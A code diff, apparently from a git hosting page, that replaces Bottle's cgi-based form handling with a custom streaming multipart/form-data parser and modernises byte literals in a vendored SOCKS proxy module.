from collections import MutableMapping as DictMixin
|
||||
from collections import MutableMapping as DictMixin, defaultdict
|
||||
from inspect import getargspec
|
||||
|
||||
unicode = unicode
|
||||
@@ -1137,6 +1138,399 @@ class Bottle(object):
|
||||
# HTTP and WSGI Tools ##########################################################
|
||||
###############################################################################
|
||||
|
||||
# Multipart parsing stuff
|
||||
|
||||
class StopMarkupException(BottleException):
|
||||
pass
|
||||
|
||||
|
||||
HYPHEN = tob('-')
|
||||
CR = tob('\r')
|
||||
LF = tob('\n')
|
||||
CRLF = CR + LF
|
||||
LFCRLF = LF + CR + LF
|
||||
HYPHENx2 = HYPHEN * 2
|
||||
CRLFx2 = CRLF * 2
|
||||
CRLF_LEN = len(CRLF)
|
||||
CRLFx2_LEN = len(CRLFx2)
|
||||
|
||||
MULTIPART_BOUNDARY_PATT = re.compile(r'^multipart/.+?boundary=(.+?)(;|$)')
|
||||
|
||||
class MPHeadersEaeter:
|
||||
end_headers_patt = re.compile(tob(r'(\r\n\r\n)|(\r(\n\r?)?)$'))
|
||||
|
||||
def __init__(self):
|
||||
self.headers_end_expected = None
|
||||
self.eat_meth = self._eat_first_crlf_or_last_hyphens
|
||||
self._meth_map = {
|
||||
CR: self._eat_lf,
|
||||
HYPHEN: self._eat_last_hyphen
|
||||
}
|
||||
self.stopped = False
|
||||
|
||||
def eat(self, chunk, base):
|
||||
pos = self.eat_meth(chunk, base)
|
||||
if pos is None: return
|
||||
if self.eat_meth != self._eat_headers:
|
||||
if self.stopped:
|
||||
raise StopMarkupException()
|
||||
base = pos
|
||||
self.eat_meth = self._eat_headers
|
||||
return self.eat(chunk, base)
|
||||
# found headers section end, reset eater
|
||||
self.eat_meth = self._eat_first_crlf_or_last_hyphens
|
||||
return pos
|
||||
|
||||
def _eat_last_hyphen(self, chunk, base):
|
||||
chunk_start = chunk[base: base + 2]
|
||||
if not chunk_start: return
|
||||
if chunk_start == HYPHEN:
|
||||
self.stopped = True
|
||||
return base + 1
|
||||
raise HTTPError(422, 'Last hyphen was expected, got (first 2 symbols slice): %s' % chunk_start)
|
||||
|
||||
def _eat_lf(self, chunk, base):
|
||||
chunk_start = chunk[base: base + 1]
|
||||
if not chunk_start: return
|
||||
if chunk_start == LF: return base + 1
|
||||
invalid_sequence = CR + chunk_start
|
||||
raise HTTPError(422, 'Malformed headers, found invalid sequence: %s' % invalid_sequence)
|
||||
|
||||
def _eat_first_crlf_or_last_hyphens(self, chunk, base):
|
||||
chunk_start = chunk[base: base + 2]
|
||||
if not chunk_start: return
|
||||
if chunk_start == CRLF: return base + 2
|
||||
if len(chunk_start) == 1:
|
||||
self.eat_meth = self._meth_map.get(chunk_start)
|
||||
elif chunk_start == HYPHENx2:
|
||||
self.stopped = True
|
||||
return base + 2
|
||||
if self.eat_meth is None:
|
||||
raise HTTPError(422, 'Malformed headers, invalid section start: %s' % chunk_start)
|
||||
|
||||
def _eat_headers(self, chunk, base):
|
||||
expected = self.headers_end_expected
|
||||
if expected is not None:
|
||||
expected_len = len(expected)
|
||||
chunk_start = chunk[base:expected_len]
|
||||
if chunk_start == expected:
|
||||
self.headers_end_expected = None
|
||||
return base + expected_len - CRLFx2_LEN
|
||||
chunk_start_len = len(chunk_start)
|
||||
if not chunk_start_len: return
|
||||
if chunk_start_len < expected_len:
|
||||
if expected.startswith(chunk_start):
|
||||
self.headers_end_expected = expected[chunk_start_len:]
|
||||
return
|
||||
self.headers_end_expected = None
|
||||
if expected == LF: # we saw CRLFCR
|
||||
invalid_sequence = CR + chunk_start[0:1]
|
||||
# NOTE we don not catch all CRLF-malformed errors, but only obvious ones
|
||||
# to stop doing useless work
|
||||
raise HTTPError(422, 'Malformed headers, found invalid sequence: %s' % invalid_sequence)
|
||||
else:
|
||||
assert expected_len >= 2 # (CR)LFCRLF or (CRLF)CRLF
|
||||
self.headers_end_expected = None
|
||||
assert self.headers_end_expected is None
|
||||
s = self.end_headers_patt.search(chunk, base)
|
||||
if s is None: return
|
||||
end_found = s.start(1)
|
||||
if end_found >= 0: return end_found
|
||||
end_head = s.group(2)
|
||||
if end_head is not None:
|
||||
self.headers_end_expected = CRLFx2[len(end_head):]
|
||||
|
||||
|
||||
class MPBodyMarkup:
|
||||
def __init__(self, boundary):
|
||||
self.markups = []
|
||||
self.error = None
|
||||
if CR in boundary:
|
||||
raise HTTPError(422, 'The `CR` must not be in the boundary: %s' % boundary)
|
||||
boundary = HYPHENx2 + boundary
|
||||
self.boundary = boundary
|
||||
token = CRLF + boundary
|
||||
self.tlen = len(token)
|
||||
self.token = token
|
||||
self.trest = self.trest_len = None
|
||||
self.abspos = 0
|
||||
self.abs_start_section = 0
|
||||
self.headers_eater = MPHeadersEaeter()
|
||||
self.cur_meth = self._eat_start_boundary
|
||||
self._eat_headers = self.headers_eater.eat
|
||||
self.stopped = False
|
||||
self.idx = idx = defaultdict(list) # 1-based indices for each token symbol
|
||||
for i, c in enumerate(token, start=1):
|
||||
idx[c].append([i, token[:i]])
|
||||
|
||||
def _match_tail(self, s, start, end):
|
||||
idxs = self.idx.get(s[end - 1])
|
||||
if idxs is None: return
|
||||
slen = end - start
|
||||
assert slen <= self.tlen
|
||||
for i, thead in idxs: # idxs is 1-based index
|
||||
search_pos = slen - i
|
||||
if search_pos < 0: return
|
||||
if s[start + search_pos:end] == thead: return i # if s_tail == token_head
|
||||
|
||||
def _iter_markup(self, chunk):
|
||||
if self.stopped:
|
||||
raise StopMarkupException()
|
||||
cur_meth = self.cur_meth
|
||||
abs_start_section = self.abs_start_section
|
||||
start_next_sec = 0
|
||||
skip_start = 0
|
||||
tlen = self.tlen
|
||||
eat_data, eat_headers = self._eat_data, self._eat_headers
|
||||
while True:
|
||||
try:
|
||||
end_section = cur_meth(chunk, start_next_sec)
|
||||
except StopMarkupException:
|
||||
self.stopped = True
|
||||
return
|
||||
if end_section is None: break
|
||||
if cur_meth == eat_headers:
|
||||
sec_name = 'headers'
|
||||
start_next_sec = end_section + CRLFx2_LEN
|
||||
cur_meth = eat_data
|
||||
skip_start = 0
|
||||
elif cur_meth == eat_data:
|
||||
sec_name = 'data'
|
||||
start_next_sec = end_section + tlen
|
||||
skip_start = CRLF_LEN
|
||||
cur_meth = eat_headers
|
||||
else:
|
||||
assert cur_meth == self._eat_start_boundary
|
||||
sec_name = 'data'
|
||||
start_next_sec = end_section + tlen
|
||||
skip_start = CRLF_LEN
|
||||
cur_meth = eat_headers
|
||||
|
||||
# if the body starts with a hyphen,
|
||||
# we will have a negative abs_end_section equal to the length of the CRLF
|
||||
abs_end_section = self.abspos + end_section
|
||||
if abs_end_section < 0:
|
||||
assert abs_end_section == -CRLF_LEN
|
||||
end_section = -self.abspos
|
||||
yield sec_name, (abs_start_section, self.abspos + end_section)
|
||||
abs_start_section = self.abspos + start_next_sec + skip_start
|
||||
self.abspos += len(chunk)
|
||||
self.cur_meth = cur_meth
|
||||
self.abs_start_section = abs_start_section
|
||||
|
||||
def _eat_start_boundary(self, chunk, base):
|
||||
if self.trest is None:
|
||||
chunk_start = chunk[base: base + 1]
|
||||
if not chunk_start: return
|
||||
if chunk_start == CR: return self._eat_data(chunk, base)
|
||||
boundary = self.boundary
|
||||
if chunk.startswith(boundary): return base - CRLF_LEN
|
||||
if chunk_start != boundary[:1]:
|
||||
raise HTTPError(
|
||||
422, 'Invalid multipart/formdata body start, expected hyphen or CR, got: %s' % chunk_start)
|
||||
self.trest = boundary
|
||||
self.trest_len = len(boundary)
|
||||
end_section = self._eat_data(chunk, base)
|
||||
if end_section is not None: return end_section
|
||||
|
||||
def _eat_data(self, chunk, base):
|
||||
chunk_len = len(chunk)
|
||||
token, tlen, trest, trest_len = self.token, self.tlen, self.trest, self.trest_len
|
||||
start = base
|
||||
match_tail = self._match_tail
|
||||
part = None
|
||||
while True:
|
||||
end = start + tlen
|
||||
if end > chunk_len:
|
||||
part = chunk[start:]
|
||||
break
|
||||
if trest is not None:
|
||||
if chunk[start:start + trest_len] == trest:
|
||||
data_end = start + trest_len - tlen
|
||||
self.trest_len = self.trest = None
|
||||
return data_end
|
||||
else:
|
||||
trest_len = trest = None
|
||||
matched_len = match_tail(chunk, start, end)
|
||||
if matched_len is not None:
|
||||
if matched_len == tlen:
|
||||
self.trest_len = self.trest = None
|
||||
return start
|
||||
else:
|
||||
trest_len, trest = tlen - matched_len, token[matched_len:]
|
||||
start += tlen
|
||||
# process the tail of the chunk
|
||||
if part:
|
||||
part_len = len(part)
|
||||
if trest is not None:
|
||||
if part_len < trest_len:
|
||||
if trest.startswith(part):
|
||||
trest_len -= part_len
|
||||
trest = trest[part_len:]
|
||||
part = None
|
||||
else:
|
||||
trest_len = trest = None
|
||||
else:
|
||||
if part.startswith(trest):
|
||||
data_end = start + trest_len - tlen
|
||||
self.trest_len = self.trest = None
|
||||
return data_end
|
||||
trest_len = trest = None
|
||||
|
||||
if part is not None:
|
||||
assert trest is None
|
||||
matched_len = match_tail(part, 0, part_len)
|
||||
if matched_len is not None:
|
||||
trest_len, trest = tlen - matched_len, token[matched_len:]
|
||||
self.trest_len, self.trest = trest_len, trest
|
||||
|
||||
def _parse(self, chunk):
|
||||
for name, start_end in self._iter_markup(chunk):
|
||||
self.markups.append([name, start_end])
|
||||
|
||||
def parse(self, chunk):
|
||||
if self.error is not None: return
|
||||
try:
|
||||
self._parse(chunk)
|
||||
except Exception as exc:
|
||||
self.error = exc
|
||||
|
||||
|
||||
class MPBytesIOProxy:
|
||||
def __init__(self, src, start, end):
|
||||
self._src = src
|
||||
self._st = start
|
||||
self._end = end
|
||||
self._pos = start
|
||||
|
||||
def tell(self):
|
||||
return self._pos - self._st
|
||||
|
||||
def seek(self, pos):
|
||||
if pos < 0: pos = 0
|
||||
self._pos = min(self._st + pos, self._end)
|
||||
|
||||
def read(self, sz=None):
|
||||
max_sz = self._end - self._pos
|
||||
if max_sz <= 0:
|
||||
return tob('')
|
||||
if sz is not None and sz > 0:
|
||||
sz = min(sz, max_sz)
|
||||
else:
|
||||
sz = max_sz
|
||||
self._src.seek(self._pos)
|
||||
self._pos += sz
|
||||
return self._src.read(sz)
|
||||
|
||||
def writable(self):
|
||||
return False
|
||||
|
||||
def fileno(self):
|
||||
raise OSError('Not supported')
|
||||
|
||||
def closed(self):
|
||||
return self._src.closed()
|
||||
|
||||
def close(self):
|
||||
pass
|
||||
|
||||
|
||||
class MPHeader:
|
||||
def __init__(self, name, value, options):
|
||||
self.name = name
|
||||
self.value = value
|
||||
self.options = options
|
||||
|
||||
|
||||
class MPFieldStorage:
|
||||
|
||||
_patt = re.compile(tonat('(.+?)(=(.+?))?(;|$)'))
|
||||
|
||||
def __init__(self):
|
||||
self.name = None
|
||||
self.value = None
|
||||
self.filename = None
|
||||
self.file = None
|
||||
self.ctype = None
|
||||
self.headers = {}
|
||||
|
||||
def read(self, src, headers_section, data_section, max_read):
|
||||
start, end = headers_section
|
||||
sz = end - start
|
||||
has_read = sz
|
||||
if has_read > max_read:
|
||||
raise HTTPError(413, 'Request entity too large')
|
||||
src.seek(start)
|
||||
headers_raw = tonat(src.read(sz))
|
||||
for header_raw in headers_raw.splitlines():
|
||||
header = self.parse_header(header_raw)
|
||||
self.headers[header.name] = header
|
||||
if header.name == 'Content-Disposition':
|
||||
self.name = header.options['name']
|
||||
self.filename = header.options.get('filename')
|
||||
elif header.name == 'Content-Type':
|
||||
self.ctype = header.value
|
||||
if self.name is None:
|
||||
raise HTTPError(422, 'Noname field found while parsing multipart/formdata body: %s' % header_raw)
|
||||
if self.filename is not None:
|
||||
self.file = MPBytesIOProxy(src, *data_section)
|
||||
else:
|
||||
start, end = data_section
|
||||
sz = end - start
|
||||
if sz:
|
||||
has_read += sz
|
||||
if has_read > max_read:
|
||||
raise HTTPError(413, 'Request entity too large')
|
||||
src.seek(start)
|
||||
self.value = tonat(src.read(sz))
|
||||
else:
|
||||
self.value = ''
|
||||
return has_read
|
||||
|
||||
@classmethod
|
||||
def parse_header(cls, s):
|
||||
htype, rest = s.split(':', 1)
|
||||
opt_iter = cls._patt.finditer(rest)
|
||||
hvalue = next(opt_iter).group(1).strip()
|
||||
dct = {}
|
||||
for it in opt_iter:
|
||||
k = it.group(1).strip()
|
||||
v = it.group(3)
|
||||
if v is not None:
|
||||
v = v.strip('"')
|
||||
dct[k.lower()] = v
|
||||
return MPHeader(name=htype, value=hvalue, options=dct)
|
||||
|
||||
@classmethod
|
||||
def iter_items(cls, src, markup, max_read):
|
||||
iter_markup = iter(markup)
|
||||
# check & skip empty data (body should start from empty data)
|
||||
null_data = next(iter_markup, None)
|
||||
if null_data is None: return
|
||||
sec_name, [start, end] = null_data
|
||||
assert sec_name == 'data'
|
||||
if end > 0:
|
||||
raise HTTPError(
|
||||
422, 'Malformed multipart/formdata, unexpected data before the first boundary at: [%d:%d]'
|
||||
% (start, end))
|
||||
headers = next(iter_markup, None)
|
||||
data = next(iter_markup, None)
|
||||
while headers:
|
||||
sec_name, headers_slice = headers
|
||||
assert sec_name == 'headers'
|
||||
if not data:
|
||||
raise HTTPError(
|
||||
422, 'Malformed multipart/formdata, no data found for the field at: [%d:%d]'
|
||||
% tuple(headers_slice))
|
||||
sec_name, data_slice = data
|
||||
assert sec_name == 'data'
|
||||
field = cls()
|
||||
has_read = field.read(src, headers_slice, data_slice, max_read=max_read)
|
||||
max_read -= has_read
|
||||
yield field
|
||||
headers = next(iter_markup, None)
|
||||
data = next(iter_markup, None)
|
||||
|
||||
|
||||
class BaseRequest(object):
|
||||
""" A wrapper for WSGI environment dictionaries that adds a lot of
|
||||
@@ -1326,6 +1720,10 @@ class BaseRequest(object):
|
||||
|
||||
@DictProperty('environ', 'bottle.request.body', read_only=True)
|
||||
def _body(self):
|
||||
mp_markup = None
|
||||
mp_boundary_match = MULTIPART_BOUNDARY_PATT.match(self.environ.get('CONTENT_TYPE', ''))
|
||||
if mp_boundary_match is not None:
|
||||
mp_markup = MPBodyMarkup(tob(mp_boundary_match.group(1)))
|
||||
try:
|
||||
read_func = self.environ['wsgi.input'].read
|
||||
except KeyError:
|
||||
@@ -1335,12 +1733,15 @@ class BaseRequest(object):
|
||||
body, body_size, is_temp_file = BytesIO(), 0, False
|
||||
for part in body_iter(read_func, self.MEMFILE_MAX):
|
||||
body.write(part)
|
||||
if mp_markup is not None:
|
||||
mp_markup.parse(part)
|
||||
body_size += len(part)
|
||||
if not is_temp_file and body_size > self.MEMFILE_MAX:
|
||||
body, tmp = NamedTemporaryFile(mode='w+b'), body
|
||||
body.write(tmp.getvalue())
|
||||
del tmp
|
||||
is_temp_file = True
|
||||
body.multipart_markup = mp_markup
|
||||
self.environ['wsgi.input'] = body
|
||||
body.seek(0)
|
||||
return body
|
||||
@@ -1378,7 +1779,7 @@ class BaseRequest(object):
|
||||
def POST(self):
|
||||
""" The values of :attr:`forms` and :attr:`files` combined into a single
|
||||
:class:`FormsDict`. Values are either strings (form values) or
|
||||
instances of :class:`cgi.FieldStorage` (file uploads).
|
||||
instances of :class:`MPBytesIOProxy` (file uploads).
|
||||
"""
|
||||
post = FormsDict()
|
||||
# We default to application/x-www-form-urlencoded for everything that
|
||||
@@ -1389,18 +1790,15 @@ class BaseRequest(object):
|
||||
post[key] = value
|
||||
return post
|
||||
|
||||
safe_env = {'QUERY_STRING': ''} # Build a safe environment for cgi
|
||||
for key in ('REQUEST_METHOD', 'CONTENT_TYPE', 'CONTENT_LENGTH'):
|
||||
if key in self.environ: safe_env[key] = self.environ[key]
|
||||
args = dict(fp=self.body, environ=safe_env, keep_blank_values=True)
|
||||
|
||||
if py3k:
|
||||
args['encoding'] = 'utf8'
|
||||
post.recode_unicode = False
|
||||
data = cgi.FieldStorage(**args)
|
||||
self['_cgi.FieldStorage'] = data #http://bugs.python.org/issue18394
|
||||
data = data.list or []
|
||||
for item in data:
|
||||
body = self.body
|
||||
markup = body.multipart_markup
|
||||
if markup is None:
|
||||
raise HTTPError(400, '`boundary` required for mutlipart content')
|
||||
elif markup.error is not None:
|
||||
raise markup.error
|
||||
for item in MPFieldStorage.iter_items(body, markup.markups, self.MEMFILE_MAX):
|
||||
if item.filename is None:
|
||||
post[item.name] = item.value
|
||||
else:
|
||||
|
||||
16
thirdparty/socks/socks.py
vendored
16
thirdparty/socks/socks.py
vendored
@@ -185,23 +185,23 @@ class socksocket(socket.socket):
|
||||
# We'll receive the server's response to determine which
|
||||
# method was selected
|
||||
chosenauth = self.__recvall(2)
|
||||
if chosenauth[0:1] != chr(0x05).encode():
|
||||
if chosenauth[0:1] != b'\x05':
|
||||
self.close()
|
||||
raise GeneralProxyError((1, _generalerrors[1]))
|
||||
# Check the chosen authentication method
|
||||
if chosenauth[1:2] == chr(0x00).encode():
|
||||
if chosenauth[1:2] == b'\x00':
|
||||
# No authentication is required
|
||||
pass
|
||||
elif chosenauth[1:2] == chr(0x02).encode():
|
||||
elif chosenauth[1:2] == b'\x02':
|
||||
# Okay, we need to perform a basic username/password
|
||||
# authentication.
|
||||
self.sendall(chr(0x01).encode() + chr(len(self.__proxy[4])).encode() + self.__proxy[4].encode() + chr(len(self.__proxy[5])).encode() + self.__proxy[5].encode())
|
||||
self.sendall(b'\x01' + chr(len(self.__proxy[4])).encode() + self.__proxy[4].encode() + chr(len(self.__proxy[5])).encode() + self.__proxy[5].encode())
|
||||
authstat = self.__recvall(2)
|
||||
if authstat[0:1] != chr(0x01).encode():
|
||||
if authstat[0:1] != b'\x01':
|
||||
# Bad response
|
||||
self.close()
|
||||
raise GeneralProxyError((1, _generalerrors[1]))
|
||||
if authstat[1:2] != chr(0x00).encode():
|
||||
if authstat[1:2] != b'\x00':
|
||||
# Authentication failed
|
||||
self.close()
|
||||
raise Socks5AuthError((3, _socks5autherrors[3]))
|
||||
@@ -209,7 +209,7 @@ class socksocket(socket.socket):
|
||||
else:
|
||||
# Reaching here is always bad
|
||||
self.close()
|
||||
if chosenauth[1] == chr(0xFF).encode():
|
||||
if chosenauth[1:2] == b'\xff':
|
||||
raise Socks5AuthError((2, _socks5autherrors[2]))
|
||||
else:
|
||||
raise GeneralProxyError((1, _generalerrors[1]))
|
||||
@@ -219,7 +219,7 @@ class socksocket(socket.socket):
|
||||
# use the IPv4 address request even if remote resolving was specified.
|
||||
try:
|
||||
ipaddr = socket.inet_aton(destaddr)
|
||||
req = req + chr(0x01).encode() + ipaddr
|
||||
req = req + b'\x01' + ipaddr
|
||||
except socket.error:
|
||||
# Well it's not an IP number, so it's probably a DNS name.
|
||||
if self.__proxy[3]:
|
||||
|
||||
Reference in New Issue
Block a user